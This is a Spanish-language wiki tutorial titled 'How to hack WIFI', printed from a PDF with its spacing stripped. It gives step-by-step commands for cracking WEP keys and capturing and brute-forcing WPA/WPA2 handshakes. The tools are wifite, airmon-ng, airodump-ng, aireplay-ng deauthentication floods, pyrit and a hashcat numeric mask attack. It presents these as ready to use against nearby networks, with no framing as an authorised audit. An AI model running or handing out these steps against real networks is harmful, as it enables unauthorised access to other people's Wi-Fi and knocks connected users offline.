Está en la página 1de 6

10/4/2016

CmohackearWIFIHackLab

CmohackearWIFI
DeHackLab
EsteartculoasumequetensunpendrivevivoconWifislax(otensinstaladoslosprogramasnecesarios)y
sabscmoarrancardesdeunpendriveeinstalarGNU/Linux.
Nota:Sisabestantodeberasestarleenseandoatusamigas!

Contenido
1WEP
1.1Wifite
1.2Aircrack
1.2.1Levantamosunainterfazenmodomonitor
1.2.2Escaneamosparaverlasredes
1.2.3Empezamosacapturareltrfico
1.2.4Inyectamospaquetes
1.2.5Crackeamoslaclave
2WPA/WPA2
2.1CapturarSaludo(Handshake)
2.1.1Handshaker
2.1.2Wifite
2.1.3Aircrack
2.2ValidarSaludo
2.3LimpiarSaludo
2.4CrackearSaludo
2.4.1CrackearconHashcat
3WPS

WEP
SivesunaredWEPconsuficientesealyusuariosconectados(clientes)muyprobablementeconsigasla
clave.

Wifite
Abrimosunaterminalyejecutamoswifitecomoroot.
sudowifite

.;'`;,
.;',;'`;,`;,WiFitev2(r86)
.;',;',;'`;,`;,`;,
:::::():::::automatedwirelessauditor
https://wiki.hackcoop.com.ar/C%C3%B3mo_hackear_WIFI

1/6

10/4/2016

CmohackearWIFIHackLab

':.':.':./_\,:',:',:'
':.':./___\,:',:'designedforLinux
':./_____\,:'
/\
[+]scanningforwirelessdevices...
[+]enablingmonitormodeonwlp3s0...done
[+]initializingscan(mon0),updatesat5secintervals,CTRL+Cwhenready.
[0:00:04]scanningwirelessnetworks.0targetsand0clientsfound
[+]scanning(mon0),updatesat5secintervals,CTRL+Cwhenready.

CuandoaparezcansuficintesredesyclientesledamosCTRL+C
Nota:
wlp3s0,wlan0,usb0,etcsonnuestrasinterfacesderedinalambricas.Unaplacadewifi,undongle
usb,nuestropuertoethernetsoninterfacesderedporlasquepuedehablarnuestrosistema
operativoconlared.
mon0,esunainterfazderedenmodomonitorestasnospermitenescucharytransmitiroinyectar
paquetesquelellegaranalosdemasclientesyAPs(AccessPointsoPuntosdeAcceso)

NUMESSIDCHENCRPOWERWPS?CLIENT

1Fibertel1WEP53dbno
2Arnet1WPA47dbno
3Goku1WPA232dbno
[+]selecttargetnumbers(15)separatedbycommas,or'all':

ElegimosunaredqueuseWEPytengaclientes
Nota:
ESSIDeselnombredelaredwifi.
CHochanneleselcanal,unnumerodel1al11queindicalafrecuencia.Wififuncionaauna
frecuenciade2.4Ghzo2400Mhz.

https://wiki.hackcoop.com.ar/C%C3%B3mo_hackear_WIFI

2/6

10/4/2016

CmohackearWIFIHackLab

ENCReselmtododeencriptado:abierto,WEP,WPAoWPA2.
WPS?sielAPsoportaWPSono.
CLIENTsidetectamosalgunclientedelAP.
EsperaaquegeneresuficientesIVs.
Aveceswifitepierdelapacienciaycortaantes,talvezquierasprobarelmtododeaircrackqueesunpoco
msmanual.

Aircrack
Levantamosunainterfazenmodomonitor
sudoairmonngstartwlan0

Nota:Reemplazamoswlan0porelnombredenuestrainterfazderedinalmbrica.sudoairmonngnos
muestraellistadodeinterfaces.
Escaneamosparaverlasredes
sudoairodumpngmon0

CuandohayamosdetectadolasredesdeseadascortamosconCTRL+C.
Nota:Podemosfiltrarpordiferentescamposparaobtenersololosresultadosquenosinteresen.
channelxelcanalenelquequeremosescuchar.
encryptwepeltipodeencriptacinquequeremosdetectar.
bssid01:23:45:67:89:ablamacaddressdelAPquequeremosescuchar.
mon0loreemplazamosporelnombredenuestrainterfazenmodomonitor(generalmentemon0).

Empezamosacapturareltrfico
sudoairodumpngwsalidaivschannel1bssid01:23:45:67:89:abmon0

YlodejamoscapturandotodoslosIVsquenecesitemos(columna#Data).
Nota:
wsalidaledicequeguardeeltraficocapturadoenelarchivosalida.
ivsledicequesologuardelosIVs(loquerealmentenecesitamospararomperWEP.)

https://wiki.hackcoop.com.ar/C%C3%B3mo_hackear_WIFI

3/6

10/4/2016

CmohackearWIFIHackLab

Inyectamospaquetes
Sinohaymuchosclientesotrficooqueremosacelerarelprocesopodemosinyectarpaquetesconaireplay.
**TODO**
miralasopcionesdeaireplayngconh

Crackeamoslaclave
ParaestonecesitarasmuchosIVs,alrededorde5000o10000suelensersuficientes.Noesnecesario
detenerelairodumpparahaceresto,sinoalcanzanlosIVsenelmomentoaircrackesperaryvolvera
intentarcuandohayams.
aircrackngsalida.cap

WPA/WPA2
CapturarSaludo(Handshake)
Handshaker
Wifite
SiguelospasosparaWEPperoseleccionandounareddiferente.Muchasvecesnofunciona.
Aircrack
Primerolevantamosunainterfazenmodomonitor(vermsarriba).
Luegoempezacapturarlospaquetesenunarchivo.Estecomandoguardarlospaquetesenviadosdesdey
haciaelrouterconmacaddress00:11:aa:bb:cc:ddycanal11enelarchivosalida.cap.
sudoairodumpngchannel11bssid00:11:aa:bb:cc:ddwsalidamon0

Nota:Sinosabeselcanaloelbssid(macaddress)delared,podescorrerelsiguientecomandoyfijarte
cualesaparecen.
sudoairodumpngmon0

Yfinalmentedesconectaalagilada(tienequehaberusuariosconectadosalwifi).Paraestousamosaireplay
conlaopciondeautho0ycuantosintentosdedesconexionqueremoshacer.Paraestoesconveniente
tenerbuenasealtantoconelroutercomoconelcliente.
aireplayng08caa:aa:aa:aa:aa:aaa00:11:aa:bb:cc:dd
https://wiki.hackcoop.com.ar/C%C3%B3mo_hackear_WIFI

4/6

10/4/2016

CmohackearWIFIHackLab

aireplayng08caa:aa:aa:aa:aa:aaa00:11:aa:bb:cc:dd

Nota:
caa:aa:aa:aa:aa:aaLamacaddressdelosclientesostations,sinolaponemosintentar
desconectartodoslosclientesdeeserouter.
a00:11:aa:bb:cc:ddLamacaddressdelAPorouter.Estaopcinesrequerida.
08odeauth8Seguidodeunnumeroescuantosintentosdedesconectaralosclientesqueremos
hacer.0intentarasinparar.

ValidarSaludo
PyritesunprogramamuycompletoparacrackearclavesWPAytieneunafuncionalidadmuypracticaque
nosdicelacalidaddelsaludoquehemoscapturado.Aveceslamalasealhacequetengamosquecapturar
variossaludoshastaqueunoestacompleto.
pyritrsalida.capanalyze

LimpiarSaludo
Juntoconelsaludosecapturamuchotrafico,conpyritpodemoslimpiarlasalidacapturadayguardarsolo
elsaludoquequeremos.
pyritrsalida.caposalidalimpia.capstrip

CrackearSaludo
Pyritesmasrpidoparacrackearclavesbasadoendiccionariosperonotieneotrasfuncionalidadesquesi
tienenotrosprogramasespecificosdecrackeodeclavescomomascarasyataquesdefuerzabruta.Poresto
avecesvamosapreferirusarhashcat.
CrackearconHashcat
Primerovamosatenerqueconvertirlacapturadelformatocapalformatohccapqueeselutilizadopor
hashcat.Lohacemosconelsiguientecomandoquenosdejaraunarchivosalida.hccap
aircrackngsalida.capJsalida

Acrackearqueseacabaelmundo!
hashcatm2500a3salida.hccap?d?d?d?d?d?d?d?d

Nota:
Chequealadocumentacinparamasayuda.
https://wiki.hackcoop.com.ar/C%C3%B3mo_hackear_WIFI

5/6

10/4/2016

CmohackearWIFIHackLab

m2500Quetipodeclavequeremoscrackear,enestecasoWPA.
a3Quetipodeataque.Enestecaso3fuerzabruta.
salida.hccapelarchivoconelsaludo.
?d?d?d?d?d?d?d?dmascaraparaelataqueporfuerzabruta,8caracteresnumricos.

WPS
Obtenidodehttps://wiki.hackcoop.com.ar/index.php?title=Cmo_hackear_WIFI&oldid=7044

Estapginafuemodificadaporltimavezel11feb2016alas04:16.
Elcontenidoestdisponiblebajolalicenciahttps://creativecommons.org/licenses/bysa/3.0/legalcode
amenosqueseindiquelocontrario.

https://wiki.hackcoop.com.ar/C%C3%B3mo_hackear_WIFI

6/6